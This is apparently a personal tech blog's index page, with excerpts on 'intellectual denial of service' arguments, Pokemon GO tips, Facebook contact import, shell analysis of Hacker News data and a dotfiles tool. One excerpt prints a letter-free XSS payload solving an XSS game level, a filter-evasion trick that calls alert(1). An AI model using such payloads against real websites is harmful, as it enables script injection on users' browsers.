The Map to Nowhere: Intellectual denial of service attacks, part 2

Stick ’em up, you were wrong on the internet

In my first post on intellectual denial of service attacks, I covered something I dubbed “bad infinitum,” a tendency for non-experts to overwhelm experts with repetitive, costly, and often unproductive demands for evidence or counter-argument to oft-debunked or misleading claims. Here, I’ll cover another of these intellectual attack vectors, which I’ll call “the map to nowhere.” An asymmetry exists in each of these attacks: easy to launch, hard to counter.

Many responses to my first post mentioned the need for a renewed trust of experts. I’m not so sure of this. The squelching of productive conversation can go both ways, as I hope to describe.

(Aside: In a comment on Hacker News, tinono mentioned noticing a similarity with Paul Graham’s essay, “Keep Your Identity Small,” in my comment about not wanting to go back on previously-stated beliefs. His essay greatly influenced my thinking on the topic, and it deserves your attention if you haven’t read it)

Read More

Intellectual denial of service attacks

We live in an era that devalues conformity, while simultaneously preserving it in many interesting ways. Everyone is allowed to have an opinion. Divergent views produce conflict, however, and disagreement, argument, and debate define our current moment.

If we merely disagreed on matters of taste – our favorite color, music, movies, etc. – we could avoid such conflicts. Increasingly, though, we disagree on more fundamental ideas. Some deny the spherical shape of the Earth and the heliocentric model of the solar system (I highly recommend Behind the Curve, a movie about this movement). Arguments of all shapes and sizes spring up everywhere: capitalism vs. socialism, humanity’s role in climate change, on and on.

The democratization of virality amplifies these disagreements. Previously obscure ideas can quickly become widely known. Competing ideological camps endlessly try to score points on one another. The internet rewards this behavior with fame and other social capital. Various forms of what I’ll call “intellectual denial of service” act to reinforce this dynamic. I’ll describe one of these attack vectors in this post.

Read More

Hello, world

Techiavelli

Anyone who read my post yesterday is probably confused by 1) this domain name and 2) my mention of it being my “first post”. This blog is a reboot of my previous site (where the older posts came from). I’m starting over in hopes that it will incentivize me to take blogging seriously again. This post will explain my plans for this blog, and with any luck, convince you to come along for that ride. I had imagined writing a longer and more thoughtful introduction, but events have conspired to force my hand. When in doubt, start.

… one must never allow disorder to continue so as to escape a war. Anyhow one does not escape; the war is merely postponed to one’s disadvantage.

Machiavelli, The Prince

For several years, I fell out of the habit of writing regularly. I would occasionally post something on Medium, but mostly I just lapsed into silence (except on Twitter, where I’m rather noisy). Inertia took hold, and the habit of not writing eventually replaced my habit of regularly doing so. I regret this mistake.

Writing clarifies thinking. It also preserves a record of unadulterated and imperfect thought. Reading old blog posts of mine, I get a sense of what was in my mind at the time of writing. I can see specific patterns or beliefs that I’ve since outgrown, but also interesting ideas that I had lost and forgotten. To make up for my sloth, I’ll be writing one post a day for a little while. So much thought has gunked up my brain without being released that it’s time for a core dump.

Read More

What goes up…

It’s never a good time to suddenly find yourself jobless. But it’s never a bad time to evaluate your skills, your goals, and where you’re headed.

We all want to be a valued member of a winning team on an inspiring mission

Graham Weston

It’s easy to get complacent after a few years in a good job. You tell yourself, “I’m doing such important work! We’re making so much progress! I love my team!” You’re churning out pull requests, responding to emails and Slack messages, burning through your JIRA backlog.

Then, one day, it all stops.

Read More

21 Tips and Resources for The Obsessed Pokemon GO Player

I’ve become somewhat obsessed with Pokemon GO since I started playing it, and I’ve been trying to cobble together a mental guide for how to be successful from a hodge-podge of sites, people I’ve met while playing the game, and some of my own experiences. Here’s what I’ve got so far. Items in red are ones I’m less sure of.

Finding Pokemon

  1. The panel at the bottom right tells you what Pokemon are near. 3 feet = far, 2 feet = nearby, 1 foot = close, none = very close
  2. The Pokemon in the panel are arranged by closeness. Watching how they re-arrange as you walk in one direction will tell you if you’re hot or cold. Work together with friends to cover a wider area
  3. Rustling grass patches aren’t necessarily Pokemon. They may be nearby, though
  4. Look for Pokemon GO maps of your city on reddit. You can also use the official Ingress map for a rough guide, but you have to sign up for an account, which I didn’t bother to do.
    1. Bonus! For those lucky enough to live in Austin, here’s a user-created map of the various locations of note
  5. Some Pokemon are easiest to get by hatching eggs. Check out this list of Pokemon with the distance required to hatch their egg to get an idea of what each of your eggs might be
  6. Incense seems to mostly attract common Pokemon, so it’s useful when you’re trying to catch a few to level up
  7. Walking along roadways SEEMS to yield fairly weak results. Try finding parks and other open areas that are high in pedestrian traffic. There also doesn’t seem to be any universal rarity scale – it appears to be dependent on where you are, so look around when you’re far from home!

Once You Find Them

  1. Spinning your pokeball with your finger (swiping to the side) before throwing it makes you throw a curveball, which gives you a 10XP bonus. It MIGHT make your throw more effective too, but I’m not sure about this
  2. Hitting a Pokemon in the colored circle, when the circle is small, gives you the best chance to capture it. Hit it outside the colored circle, or when the circle is bigger, and it’ll be harder
  3. Waiting to evolve your Pokemon until you’re a higher level will improve the boost in CP your Pokemon gets

Getting Items

  1. Poke Stops regenerate after a few minutes. If you find a comfortable spot, hit one a few times. If you’re surrounded by them, walk in a circuit so that the first one is recharged by the time you return to it
  2. Controlling a gym for 21 hours gives you a small number of Poke-coins that you can spend in the store. Work with teammates to help lock down gyms

Battling Other Players

  1. To train your Pokemon, go to a gym owned by your team and tap the boxing glove icon to train against the Pokemon at that gym
  2. Leaving a Pokemon at a friendly-controlled gym will help strengthen it against rival teams, since rivals will have to defeat your Pokemon before taking on the gym’s master
  3. Here’s Niantic’s guide for attacking a rival-controlled gym, and using attacks in general

Battling the App

  1. Carry around a battery pack for your phone. Seriously.
  2. Turn on the “battery saver” and turn your phone upside down. It will dim the screen, vibrating when there is a Pokemon nearby
  3. Disabling the AR feature saves some battery, and sanity (you won’t have to turn around constantly trying to find your Pokemon)
  4. If you want to get really hardcore, you could buy a Pokemon GO wearable for ~$200 on eBay so you don’t have to stare at your phone constantly (they supposedly ship in late July). Caveat emptor. Pre-orders sold out, but Nintendo will probably offer them for sale again in the near future given the game’s popularity
  5. Be aware that, on iOS at the moment, you’ll be giving up full access to your Google account if you log in with it. Niantic says they’re working on a fix, but in the meantime, maybe try creating a Trainer account instead
  6. All those people you see huddled around popular Poke stops, pacing around while staring at their phones? Go talk to them – they probably know something that you and I don’t!

Good luck out there!

Where do those “Recommended Friends” come from?

Have you ever logged onto Facebook to find “Recommended Friends” that you didn’t expect to see? Maybe someone you briefly met on Tinder, or a co-worker you hate? I think many people are unaware that, by default, the Facebook app on mobile devices automatically imports your contact list, continuously (this includes, so far as I can tell, every piece of information about them that you have stored).

I started noticing this a long time ago, but I sense that there are many who just assume Facebook is omniscient and don’t give it another thought. There are many reasons you may not want to give up this power, and so far as I can tell, the only way to stop importing this information is to delete the Facebook app from your phone. If anyone is aware of a specific privacy setting one can use to disable this behavior, leave a comment on this post!

If you’ve already unwittingly imported your contacts (you can see them here) and want to remove them, click here.

Analyzing ~425 days of Hacker News posts with standard shell commands

(About) 425 days ago (at the time of this writing) I started scraping Hacker News via its shiny new API. And then I promptly forgot about it. That is, until I noticed my cronjob had been throwing errors constantly for a few weeks:

Traceback (most recent call last):
  File "/home/dummy/projects/hn-cron/hn.py", line 62, in <module>
    main()
  File "/home/dummy/projects/hn-cron/hn.py", line 53, in main
    log_line = str(details['id']) + "\t" + details['title'] + "\t" + details['url'] + "\t" + str(details['score']) + "\n"
KeyError: 'url'

Instead of fixing anything, I just commented out the cronjob. But now I feel somewhat obligated to do at least a rudimentary analysis of this data. In keeping with my extreme negligence/laziness throughout this project, I hacked together a few bash commands to do just that.

A few notes about this data, and the (in)accuracy thereof:

  1. The script ran once every 40 minutes, collecting the 30 most popular stories (i.e. those on the front page), and adding them to the list if they were new
  2. I only know I started roughly 425 days ago because the first link in log.txt was this one right here (Who needs timestamps? I have IDs!)
  3. A not-insignificant percent (probably ~10%) of the time, the script would fail because the stupid(, stupid, stupid) Python 2 script I banged out in 10 minutes didn’t know how to handle Unicode characters properly (oops).
  4. I saved everything to a flat file with tab delineation. I probably should’ve used something else, but I didn’t, so here we are.
  5. I only saved the score from the first time a story was found, so theoretically any given post only had an arbitrary 40 minute window to accumulate points, at most. This is probably not strictly true for a number of reasons, but I’m going to pretend it is.
  6. These bash commands grew organically (often with much help from StackOverflow), so they made sense to me at the time, but YMMV
  7. The data is probably inaccurate in a million small ways, but overall, it’s at least worth poking at.

Okay, let’s get down to it!

Read More

Constructing an XSS vector, using no letters

At the risk of spoiling a somewhat-well-known XSS game, I want to share an XSS vector I had never thought of before it forced me to. The premise of this level was, essentially, that you couldn’t use any letters whatsoever in the attack vector, and you had to call alert(1).

So, without further ado, here it is:

""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]][(''+{})[5]+(''+{})[1]+((""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]])+"")[2]+(!1+'')[3]+(!0+'')[0]+(!0+'')[1]+(!0+'')[2]+(''+{})[5]+(!0+'')[0]+(''+{})[1]+(!0+'')[1]](((!1+"")[1]+(!1+"")[2]+(!0+"")[3]+(!0+"")[1]+(!0+"")[0])+"(1)")()

What a mess, right?! What the hell are we doing here? Let’s take it piece-by-piece.

Read More

dot-man

I recently hacked together a little 300-line bash script to manage my dotfiles called dot-man. Basically, it will let you manage your dotfiles in a git repository, and you can run it every so often to keep your local / remote dotfiles up to date.

Install is as simple as:

git clone git@github.com:cneill/dot-man.git
OR
git clone https://github.com/cneill/dot-man.git

Let me know what you think! You can find me on Twitter @ccneill.